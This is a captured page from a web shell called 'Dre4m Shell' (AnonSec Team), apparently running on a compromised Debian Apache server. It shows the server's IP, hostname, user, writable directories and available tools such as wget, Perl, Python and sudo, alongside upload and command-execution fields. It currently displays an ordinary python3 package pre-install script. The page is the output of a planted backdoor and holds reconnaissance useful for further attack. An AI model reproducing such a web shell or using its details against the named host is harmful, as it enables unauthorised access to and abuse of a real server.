Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.137.190.77
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/lib/dpkg/info/python3.preinst
#! /bin/sh
set -e

# remove the python3 alternatives before installing our own python3 link

update-alternatives --auto /usr/bin/python3 >/dev/null 2>&1 || true

[ -L /usr/share/doc/python3/html ] || rm -rf /usr/share/doc/python3/html

case "$1" in
    upgrade)
	oldv=$(echo $2 | sed 's/^\(...\).*/\1/')
	if [ "$DEBIAN_FRONTEND" != noninteractive ]; then
	    echo "running python pre-rtupdate hooks for python3.11..."
	fi
	for hook in /usr/share/python3/runtime.d/*.rtupdate; do
	    [ -x $hook ] || continue
	    if ! $hook pre-rtupdate python$oldv python3.11; then
		hb=$(basename $hook .rtupdate)
		echo >&2 "error running python pre-rtupdate hook $hb"
		echo >&2 "running python failed-pre-rtupdate hook $hb"
		$hook failed-pre-rtupdate python$oldv python3.11
		errors=yes
		break
	    fi
	done
	[ -z "$errors" ] || exit 3
esac



Anon7 - 2022
AnonSec Team